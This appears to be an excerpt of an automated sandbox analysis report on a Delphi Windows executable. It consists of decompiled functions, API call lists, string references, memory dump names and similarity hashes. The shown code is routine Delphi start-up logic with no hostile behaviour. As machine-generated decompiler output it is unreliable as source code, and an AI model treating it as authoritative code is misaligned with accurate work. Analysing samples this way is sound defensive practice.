lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DFA
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E41
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E51
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E79
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E89
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405EAF
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405EBF

Strings

Software\Borland\Delphi\Locales, xrefs: 00405D0C
Software\Borland\Locales, xrefs: 00405CD0, 00405CEE

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 40d43e4aa967ba0e44d00b39daf8816187a9c2091b90e9bc261389aedf9edc94
Instruction ID: a95c978ba0d7d151ab845f00ccb1e953877a4a526e1e70593208f9c5fde5a4dc
Opcode Fuzzy Hash: 40d43e4aa967ba0e44d00b39daf8816187a9c2091b90e9bc261389aedf9edc94
Instruction Fuzzy Hash: 6F318F71E0061C6AFB25D6B8DC46BDF6AAC8B04344F4401F7AA44F61C1E6789F848F94

Uniqueness

Uniqueness Score: -1.00%

Function 00440F64, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00440F64(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x440fea);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x492b74 =  *0x492b74 - 1;
				if( *0x492b74 < 0) {
					 *0x492b70 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x492b70;
					E00440D14(_t16, __edi,  *0x492b70);
					_t6 =  *0x431620; // 0x43166c
					E004137EC(_t6, _t16, _t17,  *0x492b70);
					_t8 =  *0x431620; // 0x43166c
					E0041388C(_t8, _t16, _t17, _t31);
					_t21 =  *0x431620; // 0x43166c
					_t10 =  *0x4425f4; // 0x442640
					E00413838(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x431620; // 0x43166c
					_t12 =  *0x440ff4; // 0x441040
					E00413838(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x431620; // 0x43166c
					_t14 =  *0x4411a8; // 0x4411f4
					E00413838(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x440ff1);
				return 0;
			}

0x00440f64
0x00440f64
0x00440f69
0x00440f6a
0x00440f6f
0x00440f72
0x00440f75
0x00440f7c
0x00440f8c
0x00440f8c
0x00440f93
0x00440f98
0x00440f9d
0x00440fa2
0x00440fa7
0x00440fac
0x00440fb2
0x00440fb7
0x00440fbc
0x00440fc2
0x00440fc7
0x00440fcc
0x00440fd2
0x00440fd7
0x00440fd7
0x00440fde
0x00440fe1
0x00440fe4
0x00440fe9

APIs

GetVersion.KERNEL32(00000000,00440FEA), ref: 00440F7E

Part of subcall function 00440D14: GetCurrentProcessId.KERNEL32(?,00000000,00440E8C), ref: 00440D35
Part of subcall function 00440D14: GlobalAddAtomA.KERNEL32 ref: 00440D68
Part of subcall function 00440D14: GetCurrentThreadId.KERNEL32 ref: 00440D83
Part of subcall function 00440D14: GlobalAddAtomA.KERNEL32 ref: 00440DB9
Part of subcall function 00440D14: RegisterClipboardFormatA.USER32 ref: 00440DCF
Part of subcall function 00440D14: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 00440E53
Part of subcall function 00440D14: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440E64

Strings

@&D, xrefs: 00440FB2

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
String ID: @&D
API String ID: 3775504709-1035227775
Opcode ID: a2fbba5a42664929df18566755faab9e3513ca1050ffd7aff72c1d59a57b5761
Instruction ID: 7a7f0a757190492a38e1b37b99fdc39b0e2de92bd21f2637399aa320090c02d8
Opcode Fuzzy Hash: a2fbba5a42664929df18566755faab9e3513ca1050ffd7aff72c1d59a57b5761
Instruction Fuzzy Hash: 7CF0CD78214641AFE314FF66EE1381837E8F74A306794103BF90083631CA78AC56CA4C

Uniqueness

Uniqueness Score: -1.00%

Function 004547D0, Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004547D0(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00406D8C(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}

0x004547dc
0x004547e6
0x004547ef
0x004547f6
0x004547f9
0x004547fa
0x00454805
0x00454809

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004547FA

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 598302c28e7f559f112a55e5b7a9db3990e1a77f1ad0f75a23d62069af91447a
Instruction ID: 5803e6755cc40272ac919c0989782a04df59f5dce5c0c45c60d630398e48ec52
Opcode Fuzzy Hash: 598302c28e7f559f112a55e5b7a9db3990e1a77f1ad0f75a23d62069af91447a
Instruction Fuzzy Hash: 44F0C579215608AFCB40DF9DC588D4AFBE8BF4C260B058195BD88CB321C234FD808F94

Uniqueness

Uniqueness Score: -1.00%

Function 0045433C, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 130
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0045433C(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				intOrPtr* _t28;
				signed int _t31;
				intOrPtr* _t32;
				signed int _t35;
				struct HINSTANCE__* _t36;
				void* _t38;
				CHAR* _t39;
				struct HWND__* _t40;
				char* _t46;
				char* _t51;
				long _t54;
				long _t58;
				struct HINSTANCE__* _t61;
				intOrPtr _t63;
				void* _t68;
				struct HMENU__* _t69;
				intOrPtr _t76;
				void* _t82;
				short _t87;

				_v48 = 0;
				_t68 = __eax;
				_push(_t82);
				_push(0x4544d3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x4544da);
					return E00404348( &_v48);
				}
				_t22 =  *0x491180; // 0x492048
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E0041D1FC(E00454858, __eax); // executed
				 *(_t68 + 0x40) = _t23;
				_t25 =  *0x476c5c; // 0x454024
				_t26 =  *0x492714; // 0x400000
				if(GetClassInfoA(_t26, _t25,  &_v44) == 0) {
					_t61 =  *0x492714; // 0x400000
					 *0x476c48 = _t61;
					_t87 = RegisterClassA(0x476c38);
					if(_t87 == 0) {
						_t63 =  *0x490f30; // 0x41d508
						E00406548(_t63,  &_v48);
						E0040A158(_v48, 1);
						E00403DA8();
					}
				}
				_t28 =  *0x490fe4; // 0x492a9c
				_t31 =  *((intOrPtr*)( *_t28))(0) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_t32 =  *0x490fe4; // 0x492a9c
				_t35 =  *((intOrPtr*)( *_t32))(1, _t31) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t35);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t36 =  *0x492714; // 0x400000
				_push(_t36);
				_push(0);
				_t7 = _t68 + 0x8c; // 0x297c0044
				_t38 = E004047F8( *_t7);
				_t39 =  *0x476c5c; // 0x454024, executed
				_t40 = E0040731C(_t39, 0x84ca0000, _t38); // executed
				 *(_t68 + 0x30) = _t40;
				_t9 = _t68 + 0x8c; // 0x44c534
				E00404348(_t9);
				 *((char*)(_t68 + 0xa4)) = 1;
				_t11 = _t68 + 0x40; // 0x10ac0000
				_t12 = _t68 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t46 =  *0x491050; // 0x492b70
				if( *_t46 != 0) {
					_t54 = E00454F30(_t68);
					_t13 = _t68 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t54); // executed
					_t58 = E00454F30(_t68);
					_t14 = _t68 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t58);
				}
				_t15 = _t68 + 0x30; // 0xe
				_t69 = GetSystemMenu( *_t15, 0);
				DeleteMenu(_t69, 0xf030, 0);
				DeleteMenu(_t69, 0xf000, 0);
				_t51 =  *0x491050; // 0x492b70
				if( *_t51 != 0) {
					DeleteMenu(_t69, 0xf010, 0);
				}
				goto L13;
			}

0x00454345
0x00454348
0x0045434c
0x0045434d
0x00454352
0x00454355
0x0045435f
0x004544bd
0x004544bf
0x004544c2
0x004544c5
0x004544d2
0x004544d2
0x00454365
0x0045436d
0x00000000
0x00000000
0x00454379
0x0045437e
0x00454385
0x0045438b
0x00454398
0x0045439a
0x0045439f
0x004543ae
0x004543b1
0x004543b6
0x004543bb
0x004543ca
0x004543cf
0x004543cf
0x004543b1
0x004543d6
0x004543df
0x004543e1
0x004543e3
0x004543e3
0x004543e9
0x004543f2
0x004543f4
0x004543f6
0x004543f6
0x004543f9
0x004543fa
0x004543fc
0x004543fe
0x00454400
0x00454402
0x00454407
0x00454408
0x0045440a
0x00454410
0x0045441c
0x00454421
0x00454426
0x00454429
0x0045442f
0x00454434
0x0045443b
0x00454441
0x00454445
0x0045444a
0x00454452
0x00454456
0x00454463
0x00454467
0x0045446e
0x00454476
0x0045447a
0x0045447a
0x00454481
0x0045448a
0x00454494
0x004544a1
0x004544a6
0x004544ae
0x004544b8
0x004544b8
0x00000000

APIs

Part of subcall function 0041D1FC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041D21A

GetClassInfoA.USER32 ref: 00454391
RegisterClassA.USER32 ref: 004543A9

Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579

SetWindowLongA.USER32 ref: 00454445
SendMessageA.USER32 ref: 00454467
SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10AC0000,0044C4A8), ref: 0045447A
GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10AC0000,0044C4A8), ref: 00454485
DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044C4A8), ref: 00454494
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044C4A8), ref: 004544A1
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044C4A8), ref: 004544B8

Strings

$@E, xrefs: 00454385, 0045441C
H I, xrefs: 00454365
p+I, xrefs: 0045444A, 004544A6

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
String ID: $@E$H I$p+I
API String ID: 2103932818-221982857
Opcode ID: 685e67a81e4949c604ffaa2b2dc12700fa6c6165387320308f4e2d3abc947387
Instruction ID: 7e8550c6c2abfd000bb9715b8e91fcd243a38e858309014aef8d95fae1ef381b
Opcode Fuzzy Hash: 685e67a81e4949c604ffaa2b2dc12700fa6c6165387320308f4e2d3abc947387
Instruction Fuzzy Hash: 94415F707402406FEB11EB69DC82F5A37E8AB55308F154076FE00EF2E7DAB8A844872C

Uniqueness

Uniqueness Score: -1.00%

Function 00440D14, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00440D14(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x440e8c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E00409348("Delphi%.8X", 0,  &_v16,  &_v8);
				E0040439C(0x492b7c, _v8);
				_t25 =  *0x492b7c; // 0x24108a8
				 *0x492b78 = GlobalAddAtomA(E004047F8(_t25));
				_t29 =  *0x492714; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E00409348("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E0040439C(0x492b80, _v20);
				_t35 =  *0x492b80; // 0x24108c4
				 *0x492b7a = GlobalAddAtomA(E004047F8(_t35));
				_t38 =  *0x492b80; // 0x24108c4
				 *0x492b84 = RegisterClipboardFormatA(E004047F8(_t38));
				 *0x492bbc = E004146F8(1);
				E00440918();
				 *0x492b6c = E00440740(1, 1);
				_t47 = E00452F50(1, __edi);
				_t78 =  *0x491278; // 0x492c08
				 *_t78 = _t47;
				_t49 = E00454034(0, 1);
				_t80 =  *0x49111c; // 0x492c04
				 *_t80 = _t49;
				_t50 =  *0x49111c; // 0x492c04
				E00455B40( *_t50, 1);
				_t53 =  *0x4307c4; // 0x4307c8
				E00413978(_t53, 0x432c88, 0x432c98);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x4768fc = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x440e93);
				E00404348( &_v20);
				return E00404348( &_v8);
			}

0x00440d1d
0x00440d20
0x00440d25
0x00440d26
0x00440d2b
0x00440d2e
0x00440d3a
0x00440d3d
0x00440d4b
0x00440d58
0x00440d5d
0x00440d6d
0x00440d77
0x00440d7c
0x00440d7f
0x00440d88
0x00440d8b
0x00440d9c
0x00440da9
0x00440dae
0x00440dbe
0x00440dc4
0x00440dd4
0x00440de5
0x00440dea
0x00440dfb
0x00440e09
0x00440e0e
0x00440e14
0x00440e1f
0x00440e24
0x00440e2a
0x00440e2c
0x00440e35
0x00440e44
0x00440e49
0x00440e58
0x00440e5c
0x00440e69
0x00440e69
0x00440e70
0x00440e73
0x00440e76
0x00440e7e
0x00440e8b

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00440E8C), ref: 00440D35
GlobalAddAtomA.KERNEL32 ref: 00440D68
GetCurrentThreadId.KERNEL32 ref: 00440D83
GlobalAddAtomA.KERNEL32 ref: 00440DB9
RegisterClipboardFormatA.USER32 ref: 00440DCF

Part of subcall function 004146F8: RtlInitializeCriticalSection.KERNEL32(00411A44,?,?,00440DE5,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 00414717

Part of subcall function 00440918: SetErrorMode.KERNEL32(00008000), ref: 00440931
Part of subcall function 00440918: GetModuleHandleA.KERNEL32(USER32,00000000,00440A7E,?,00008000), ref: 00440955
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00440962
Part of subcall function 00440918: LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00440A7E,?,00008000), ref: 0044097E
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 004409A0
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 004409B5
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 004409CA
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004409DF
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004409F4
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00440A09
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00440A1E
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00440A33
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00440A48
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440A5D
Part of subcall function 00440918: SetErrorMode.KERNEL32(?,00440A85,00008000), ref: 00440A78

Part of subcall function 00452F50: GetKeyboardLayout.USER32 ref: 00452F95
Part of subcall function 00452F50: 72E7AC50.USER32(00000000,00000000,?,?,00000000,?,00440E0E,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 00452FEA
Part of subcall function 00452F50: 72E7AD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,00440E0E,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 00452FF4
Part of subcall function 00452F50: 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,00440E0E,00000000,00000000,?,00000000,?), ref: 00452FFF

Part of subcall function 00454034: LoadIconA.USER32(00400000,MAINICON), ref: 00454119
Part of subcall function 00454034: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440E24,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 0045414B
Part of subcall function 00454034: OemToCharA.USER32(?,?), ref: 0045415E
Part of subcall function 00454034: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00440E24,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 0045419E

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 00440E53
GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440E64

Strings

USER32, xrefs: 00440E4E
Delphi%.8X, xrefs: 00440D46
AnimateWindow, xrefs: 00440E5E
ControlOfs%.8X%.8X, xrefs: 00440D97

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
API String ID: 2159221912-1126952177
Opcode ID: ae3d390876d2bc8afa20dae0fcc9a51e401959e281f9ddfb79b2c3f765abf0bd
Instruction ID: 356f96267dbb7d90c54aca1b36ca1d1b9089d299676edc16670ffe8150a110ea
Opcode Fuzzy Hash: ae3d390876d2bc8afa20dae0fcc9a51e401959e281f9ddfb79b2c3f765abf0bd
Instruction Fuzzy Hash: 8741A2B46002059FDB00FFB5DD92A9E77E5EB99308B11443BF504E73A2DB7869108B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00454034, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 125
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00454034(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = E00403940(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				E0041C178(_t91, 0);
				_t42 =  *0x491094; // 0x476468
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x491094; // 0x476468
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x455668;
				}
				_t43 =  *0x491138; // 0x476470
				_t109 =  *((short*)(_t43 + 2));
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x491138; // 0x476470
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E00455860;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = E004035AC(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = E004035AC(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
				 *((intOrPtr*)(_t90 + 0x5c)) = 0x80000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E00425C10(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x490fc8; // 0x49202c
				E00425FE0(_t103, LoadIconA( *_t53, "MAINICON"));
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x455dd0;
				_t60 =  *0x490fc8; // 0x49202c
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040ACC4(0x5c, _t109);
				_t110 = _t67;
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					E00408C10( &_v261, _t27);
				}
				_t69 = E0040ACEC( &_v261, 0x2e, _t110);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x44c534
				E004045B0(_t31, 0x100,  &_v261);
				_t75 =  *0x490ec0; // 0x492034
				if( *_t75 == 0) {
					E0045433C(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E00455FAC(_t90, 0x100);
				E004568EC(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					E00403998(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

0x00454034
0x00454034
0x00454041
0x00454043
0x00454046
0x00454046
0x0045404b
0x0045404e
0x00454054
0x00454059
0x00454063
0x00454065
0x0045406a
0x0045406d
0x0045406d
0x00454073
0x00454078
0x0045407d
0x0045407f
0x00454084
0x00454087
0x00454087
0x0045408d
0x0045409d
0x004540af
0x004540b7
0x004540bc
0x004540c2
0x004540c9
0x004540d0
0x004540d6
0x004540dc
0x004540e3
0x004540ea
0x004540f1
0x00454104
0x00454106
0x00454111
0x00454122
0x00454127
0x00454127
0x0045412d
0x00454130
0x00454143
0x0045414b
0x0045415e
0x0045416b
0x00454170
0x00454172
0x00454174
0x0045417d
0x0045417d
0x0045418a
0x00454191
0x00454193
0x00454193
0x0045419e
0x004541a3
0x004541b4
0x004541b9
0x004541c1
0x004541c5
0x004541c5
0x004541ca
0x004541ce
0x004541d2
0x004541d6
0x004541df
0x004541e7
0x004541ee
0x004541f3
0x004541f9
0x004541fb
0x00454200
0x00454207
0x00454211

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 00454119
GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440E24,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 0045414B
OemToCharA.USER32(?,?), ref: 0045415E
CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00440E24,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 0045419E

Strings

pdG, xrefs: 00454073, 0045407F
$A, xrefs: 004540FA
MAINICON, xrefs: 0045410C
hdG, xrefs: 00454059, 00454065
4 I, xrefs: 004541B9
, I, xrefs: 00454111, 00454143

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$FileIconLoadLowerModuleName
String ID: $A$, I$4 I$MAINICON$hdG$pdG
API String ID: 3935243913-1156448763
Opcode ID: 922a619da9b682197febd900e6eb4aca87468131e6d7f4f96febd67333188d54
Instruction ID: 492b8d1dde61073156ccc58a81f1fa8c89c0acc6cd51feea0c930f19b9c0e10a
Opcode Fuzzy Hash: 922a619da9b682197febd900e6eb4aca87468131e6d7f4f96febd67333188d54
Instruction Fuzzy Hash: D55160706042449FDB00DF39C885B857BE4AB15308F4480BAED48DF397D7BAD988CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00452F50, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 99
COMMON

